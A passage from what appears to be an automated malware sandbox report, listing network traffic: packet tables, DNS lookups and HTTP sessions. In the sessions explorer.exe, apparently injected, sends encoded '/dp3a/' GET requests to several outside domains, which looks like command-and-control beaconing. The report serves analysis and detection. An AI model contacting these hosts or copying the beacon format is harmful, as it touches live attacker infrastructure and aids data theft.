                                                                                                    Jun 10, 2021 14:37:05.328807116 CEST4975980192.168.2.4162.0.229.108
                                                                                                    Jun 10, 2021 14:37:05.531295061 CEST8049759162.0.229.108192.168.2.4
                                                                                                    Jun 10, 2021 14:37:05.531508923 CEST8049759162.0.229.108192.168.2.4
                                                                                                    Jun 10, 2021 14:37:05.531562090 CEST8049759162.0.229.108192.168.2.4
                                                                                                    Jun 10, 2021 14:37:05.531598091 CEST8049759162.0.229.108192.168.2.4
                                                                                                    Jun 10, 2021 14:37:05.531635046 CEST8049759162.0.229.108192.168.2.4
                                                                                                    Jun 10, 2021 14:37:05.531672001 CEST8049759162.0.229.108192.168.2.4
                                                                                                    Jun 10, 2021 14:37:05.531689882 CEST4975980192.168.2.4162.0.229.108
                                                                                                    Jun 10, 2021 14:37:05.531708002 CEST8049759162.0.229.108192.168.2.4
                                                                                                    Jun 10, 2021 14:37:05.531723022 CEST4975980192.168.2.4162.0.229.108
                                                                                                    Jun 10, 2021 14:37:05.531745911 CEST8049759162.0.229.108192.168.2.4
                                                                                                    Jun 10, 2021 14:37:05.531773090 CEST8049759162.0.229.108192.168.2.4
                                                                                                    Jun 10, 2021 14:37:05.531788111 CEST4975980192.168.2.4162.0.229.108
                                                                                                    Jun 10, 2021 14:37:05.531807899 CEST8049759162.0.229.108192.168.2.4
                                                                                                    Jun 10, 2021 14:37:05.531881094 CEST4975980192.168.2.4162.0.229.108
                                                                                                    Jun 10, 2021 14:37:05.531959057 CEST4975980192.168.2.4162.0.229.108
                                                                                                    Jun 10, 2021 14:37:05.720097065 CEST8049759162.0.229.108192.168.2.4
                                                                                                    Jun 10, 2021 14:37:10.645792961 CEST4976080192.168.2.423.227.38.74
                                                                                                    Jun 10, 2021 14:37:10.688044071 CEST804976023.227.38.74192.168.2.4
                                                                                                    Jun 10, 2021 14:37:10.688662052 CEST4976080192.168.2.423.227.38.74
                                                                                                    Jun 10, 2021 14:37:10.715167999 CEST4976080192.168.2.423.227.38.74
                                                                                                    Jun 10, 2021 14:37:10.757301092 CEST804976023.227.38.74192.168.2.4
                                                                                                    Jun 10, 2021 14:37:10.805521011 CEST804976023.227.38.74192.168.2.4
                                                                                                    Jun 10, 2021 14:37:10.805551052 CEST804976023.227.38.74192.168.2.4
                                                                                                    Jun 10, 2021 14:37:10.805566072 CEST804976023.227.38.74192.168.2.4
                                                                                                    Jun 10, 2021 14:37:10.805583000 CEST804976023.227.38.74192.168.2.4
                                                                                                    Jun 10, 2021 14:37:10.805597067 CEST804976023.227.38.74192.168.2.4
                                                                                                    Jun 10, 2021 14:37:10.805612087 CEST804976023.227.38.74192.168.2.4
                                                                                                    Jun 10, 2021 14:37:10.805733919 CEST804976023.227.38.74192.168.2.4
                                                                                                    Jun 10, 2021 14:37:10.805795908 CEST4976080192.168.2.423.227.38.74
                                                                                                    Jun 10, 2021 14:37:10.805824995 CEST4976080192.168.2.423.227.38.74
                                                                                                    Jun 10, 2021 14:37:10.805830002 CEST4976080192.168.2.423.227.38.74
                                                                                                    Jun 10, 2021 14:37:11.285413027 CEST4976080192.168.2.423.227.38.74
                                                                                                    Jun 10, 2021 14:37:16.834638119 CEST4976380192.168.2.469.162.102.218
                                                                                                    Jun 10, 2021 14:37:17.003546000 CEST804976369.162.102.218192.168.2.4
                                                                                                    Jun 10, 2021 14:37:17.003772020 CEST4976380192.168.2.469.162.102.218
                                                                                                    Jun 10, 2021 14:37:17.004250050 CEST4976380192.168.2.469.162.102.218
                                                                                                    Jun 10, 2021 14:37:17.171540976 CEST804976369.162.102.218192.168.2.4
                                                                                                    Jun 10, 2021 14:37:17.173516035 CEST804976369.162.102.218192.168.2.4
                                                                                                    Jun 10, 2021 14:37:17.173544884 CEST804976369.162.102.218192.168.2.4
                                                                                                    Jun 10, 2021 14:37:17.173861980 CEST4976380192.168.2.469.162.102.218
                                                                                                    Jun 10, 2021 14:37:17.173883915 CEST4976380192.168.2.469.162.102.218
                                                                                                    Jun 10, 2021 14:37:17.341495037 CEST804976369.162.102.218192.168.2.4
                                                                                                    Jun 10, 2021 14:37:27.348553896 CEST4976480192.168.2.435.205.61.67
                                                                                                    Jun 10, 2021 14:37:27.644581079 CEST804976435.205.61.67192.168.2.4
                                                                                                    Jun 10, 2021 14:37:27.644968033 CEST4976480192.168.2.435.205.61.67
                                                                                                    Jun 10, 2021 14:37:27.645236969 CEST4976480192.168.2.435.205.61.67
                                                                                                    Jun 10, 2021 14:37:27.931535006 CEST804976435.205.61.67192.168.2.4
                                                                                                    Jun 10, 2021 14:37:27.931746006 CEST804976435.205.61.67192.168.2.4
                                                                                                    Jun 10, 2021 14:37:27.931761980 CEST804976435.205.61.67192.168.2.4
                                                                                                    Jun 10, 2021 14:37:27.932120085 CEST4976480192.168.2.435.205.61.67
                                                                                                    Jun 10, 2021 14:37:27.932272911 CEST4976480192.168.2.435.205.61.67
                                                                                                    Jun 10, 2021 14:37:28.215754986 CEST804976435.205.61.67192.168.2.4
                                                                                                    Jun 10, 2021 14:37:33.049948931 CEST4976580192.168.2.437.48.65.148
                                                                                                    Jun 10, 2021 14:37:33.100524902 CEST804976537.48.65.148192.168.2.4
                                                                                                    Jun 10, 2021 14:37:33.100692034 CEST4976580192.168.2.437.48.65.148
                                                                                                    Jun 10, 2021 14:37:33.101150036 CEST4976580192.168.2.437.48.65.148
                                                                                                    Jun 10, 2021 14:37:33.153523922 CEST804976537.48.65.148192.168.2.4
                                                                                                    Jun 10, 2021 14:37:33.179658890 CEST804976537.48.65.148192.168.2.4
                                                                                                    Jun 10, 2021 14:37:33.180028915 CEST4976580192.168.2.437.48.65.148
                                                                                                    Jun 10, 2021 14:37:33.601315022 CEST4976580192.168.2.437.48.65.148

                                                                                                    UDP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Jun 10, 2021 14:35:22.729626894 CEST6529853192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:35:22.779958963 CEST53652988.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:35:22.783041954 CEST5912353192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:35:22.860754013 CEST53591238.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:35:23.831338882 CEST5453153192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:35:23.887283087 CEST53545318.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:35:23.917716980 CEST4971453192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:35:23.982383013 CEST53497148.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:35:24.975048065 CEST5802853192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:35:25.024985075 CEST53580288.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:35:26.377013922 CEST5309753192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:35:26.428174973 CEST53530978.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:35:27.968039989 CEST4925753192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:35:28.021265984 CEST53492578.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:35:29.130686045 CEST6238953192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:35:29.181111097 CEST53623898.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:35:30.352375984 CEST4991053192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:35:30.416027069 CEST53499108.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:35:31.599483967 CEST5585453192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:35:31.653295994 CEST53558548.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:35:32.837169886 CEST6454953192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:35:32.889580965 CEST53645498.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:35:34.180674076 CEST6315353192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:35:34.231314898 CEST53631538.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:35:35.371232986 CEST5299153192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:35:35.421302080 CEST53529918.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:35:36.581928968 CEST5370053192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:35:36.633219004 CEST53537008.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:35:38.103169918 CEST5172653192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:35:38.153357029 CEST53517268.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:35:39.310956955 CEST5679453192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:35:39.364303112 CEST53567948.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:35:40.492393970 CEST5653453192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:35:40.552254915 CEST53565348.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:35:41.670697927 CEST5662753192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:35:41.722903967 CEST53566278.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:35:42.771862030 CEST5662153192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:35:42.822462082 CEST53566218.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:35:44.090924978 CEST6311653192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:35:44.141067028 CEST53631168.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:35:56.428946972 CEST6407853192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:35:56.488899946 CEST53640788.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:36:21.692979097 CEST6480153192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:36:21.834809065 CEST53648018.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:36:24.749804020 CEST6172153192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:36:24.812876940 CEST53617218.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:36:25.792799950 CEST5125553192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:36:25.922239065 CEST53512558.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:36:26.800214052 CEST6152253192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:36:26.861669064 CEST53615228.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:36:28.283225060 CEST5233753192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:36:28.344872952 CEST53523378.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:36:28.903923035 CEST5504653192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:36:28.982779026 CEST53550468.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:36:29.762716055 CEST4961253192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:36:29.815706968 CEST53496128.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:36:30.577676058 CEST4928553192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:36:30.639964104 CEST53492858.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:36:31.975476027 CEST5060153192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:36:32.036520958 CEST53506018.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:36:33.423738956 CEST6087553192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:36:33.485572100 CEST53608758.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:36:34.775242090 CEST5644853192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:36:34.838058949 CEST53564488.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:36:34.981436968 CEST5917253192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:36:35.043040991 CEST53591728.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:36:37.972244978 CEST6242053192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:36:38.046022892 CEST53624208.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:36:43.774049997 CEST6057953192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:36:44.115781069 CEST53605798.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:36:49.679228067 CEST5018353192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:36:49.760195971 CEST53501838.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:36:54.800163984 CEST6153153192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:36:54.895533085 CEST53615318.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:37:05.074394941 CEST4922853192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:37:05.138901949 CEST53492288.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:37:10.570947886 CEST5979453192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:37:10.643258095 CEST53597948.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:37:13.748724937 CEST5591653192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:37:13.808728933 CEST53559168.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:37:15.293870926 CEST5275253192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:37:15.361018896 CEST53527528.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:37:16.292370081 CEST6054253192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:37:16.830492973 CEST53605428.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:37:22.187328100 CEST6068953192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:37:22.252890110 CEST53606898.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:37:27.296046019 CEST6420653192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:37:27.346261024 CEST53642068.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:37:32.951637983 CEST5090453192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:37:33.047657967 CEST53509048.8.8.8192.168.2.4
                                                                                                    Jun 10, 2021 14:37:38.618782997 CEST5752553192.168.2.48.8.8.8
                                                                                                    Jun 10, 2021 14:37:38.703188896 CEST53575258.8.8.8192.168.2.4

                                                                                                    DNS Queries

                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                    Jun 10, 2021 14:36:37.972244978 CEST192.168.2.48.8.8.80xba10Standard query (0)www.theyogirunner.comA (IP address)IN (0x0001)
                                                                                                    Jun 10, 2021 14:36:43.774049997 CEST192.168.2.48.8.8.80x2ba3Standard query (0)www.kladios.comA (IP address)IN (0x0001)
                                                                                                    Jun 10, 2021 14:36:49.679228067 CEST192.168.2.48.8.8.80x2d28Standard query (0)www.letstrumpbiden.comA (IP address)IN (0x0001)
                                                                                                    Jun 10, 2021 14:36:54.800163984 CEST192.168.2.48.8.8.80x9d2Standard query (0)www.hireinone.xyzA (IP address)IN (0x0001)
                                                                                                    Jun 10, 2021 14:37:05.074394941 CEST192.168.2.48.8.8.80x8470Standard query (0)www.closetofaurora.comA (IP address)IN (0x0001)
                                                                                                    Jun 10, 2021 14:37:10.570947886 CEST192.168.2.48.8.8.80x25e2Standard query (0)www.28ji.siteA (IP address)IN (0x0001)
                                                                                                    Jun 10, 2021 14:37:16.292370081 CEST192.168.2.48.8.8.80x5589Standard query (0)www.kingguardgroup.comA (IP address)IN (0x0001)
                                                                                                    Jun 10, 2021 14:37:22.187328100 CEST192.168.2.48.8.8.80xb3baStandard query (0)www.goodlukc.comA (IP address)IN (0x0001)
                                                                                                    Jun 10, 2021 14:37:27.296046019 CEST192.168.2.48.8.8.80x4cffStandard query (0)www.rebeccannemontgomery.netA (IP address)IN (0x0001)
                                                                                                    Jun 10, 2021 14:37:32.951637983 CEST192.168.2.48.8.8.80x24c4Standard query (0)www.pecon.proA (IP address)IN (0x0001)
                                                                                                    Jun 10, 2021 14:37:38.618782997 CEST192.168.2.48.8.8.80x1e72Standard query (0)www.oilleakgames.comA (IP address)IN (0x0001)

                                                                                                    DNS Answers

                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                    Jun 10, 2021 14:36:38.046022892 CEST8.8.8.8192.168.2.40xba10No error (0)www.theyogirunner.com104.232.96.207A (IP address)IN (0x0001)
                                                                                                    Jun 10, 2021 14:36:44.115781069 CEST8.8.8.8192.168.2.40x2ba3No error (0)www.kladios.com121.254.178.252A (IP address)IN (0x0001)
                                                                                                    Jun 10, 2021 14:36:49.760195971 CEST8.8.8.8192.168.2.40x2d28Name error (3)www.letstrumpbiden.comnonenoneA (IP address)IN (0x0001)
                                                                                                    Jun 10, 2021 14:36:54.895533085 CEST8.8.8.8192.168.2.40x9d2No error (0)www.hireinone.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)
                                                                                                    Jun 10, 2021 14:36:54.895533085 CEST8.8.8.8192.168.2.40x9d2No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)
                                                                                                    Jun 10, 2021 14:36:54.895533085 CEST8.8.8.8192.168.2.40x9d2No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)
                                                                                                    Jun 10, 2021 14:37:05.138901949 CEST8.8.8.8192.168.2.40x8470No error (0)www.closetofaurora.comclosetofaurora.comCNAME (Canonical name)IN (0x0001)
                                                                                                    Jun 10, 2021 14:37:05.138901949 CEST8.8.8.8192.168.2.40x8470No error (0)closetofaurora.com162.0.229.108A (IP address)IN (0x0001)
                                                                                                    Jun 10, 2021 14:37:10.643258095 CEST8.8.8.8192.168.2.40x25e2No error (0)www.28ji.sitexn-ciqpnp86gzpj.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                                    Jun 10, 2021 14:37:10.643258095 CEST8.8.8.8192.168.2.40x25e2No error (0)xn-ciqpnp86gzpj.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                                    Jun 10, 2021 14:37:10.643258095 CEST8.8.8.8192.168.2.40x25e2No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                                                    Jun 10, 2021 14:37:16.830492973 CEST8.8.8.8192.168.2.40x5589No error (0)www.kingguardgroup.com69.162.102.218A (IP address)IN (0x0001)
                                                                                                    Jun 10, 2021 14:37:22.252890110 CEST8.8.8.8192.168.2.40xb3baName error (3)www.goodlukc.comnonenoneA (IP address)IN (0x0001)
                                                                                                    Jun 10, 2021 14:37:27.346261024 CEST8.8.8.8192.168.2.40x4cffNo error (0)www.rebeccannemontgomery.net35.205.61.67A (IP address)IN (0x0001)
                                                                                                    Jun 10, 2021 14:37:33.047657967 CEST8.8.8.8192.168.2.40x24c4No error (0)www.pecon.pro37.48.65.148A (IP address)IN (0x0001)
                                                                                                    Jun 10, 2021 14:37:38.703188896 CEST8.8.8.8192.168.2.40x1e72Name error (3)www.oilleakgames.comnonenoneA (IP address)IN (0x0001)

                                                                                                    HTTP Request Dependency Graph

                                                                                                    • www.theyogirunner.com
                                                                                                    • www.kladios.com
                                                                                                    • www.hireinone.xyz
                                                                                                    • www.closetofaurora.com
                                                                                                    • www.28ji.site
                                                                                                    • www.kingguardgroup.com
                                                                                                    • www.rebeccannemontgomery.net
                                                                                                    • www.pecon.pro

                                                                                                    HTTP Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    0192.168.2.449756104.232.96.20780C:\Windows\explorer.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Jun 10, 2021 14:36:38.251010895 CEST4634OUTGET /dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=rT959XFbghPJVv5hpca1PvfPcVCtnqQ7MGzQwkslu+qbfaQ1OXZa8AaW+DloN+T+QKhF HTTP/1.1
                                                                                                    Host: www.theyogirunner.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Jun 10, 2021 14:36:38.846438885 CEST4634OUTGET /dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=rT959XFbghPJVv5hpca1PvfPcVCtnqQ7MGzQwkslu+qbfaQ1OXZa8AaW+DloN+T+QKhF HTTP/1.1
                                                                                                    Host: www.theyogirunner.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Jun 10, 2021 14:36:39.060780048 CEST4634INHTTP/1.1 200 OK
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                    X-Powered-By: Nginx
                                                                                                    Date: Thu, 10 Jun 2021 12:36:34 GMT
                                                                                                    Connection: close
                                                                                                    Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                                                    Data Ascii: 3


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    1192.168.2.449757121.254.178.25280C:\Windows\explorer.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Jun 10, 2021 14:36:44.390893936 CEST4660OUTGET /dp3a/?GR-d=9p/K3n16Mfij3JUlf4zaR/Rujbmkv/CDhZs1M9Rj6A9SEkbuvv/NT9LewVshmGfbFjhm&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1
                                                                                                    Host: www.kladios.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Jun 10, 2021 14:36:44.664067984 CEST4663INHTTP/1.1 404 Not Found
                                                                                                    Date: Thu, 10 Jun 2021 12:36:44 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 203
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 70 33 61 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dp3a/ was not found on this server.</p></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    2192.168.2.44975885.159.66.9380C:\Windows\explorer.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Jun 10, 2021 14:36:54.972332954 CEST4664OUTGET /dp3a/?GR-d=gNGby8oVX6PgZB5GWA7CusOGqzi3GywYGs/3OTvKjB1NulubMkWwqj/edMXwHBCob9Lh&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1
                                                                                                    Host: www.hireinone.xyz
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Jun 10, 2021 14:36:55.049076080 CEST4666INHTTP/1.1 404 Not Found
                                                                                                    Content-Type: text/html
                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                    X-Powered-By: ASP.NET
                                                                                                    Date: Thu, 10 Jun 2021 12:36:16 GMT
                                                                                                    Connection: close
                                                                                                    Content-Length: 1245
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
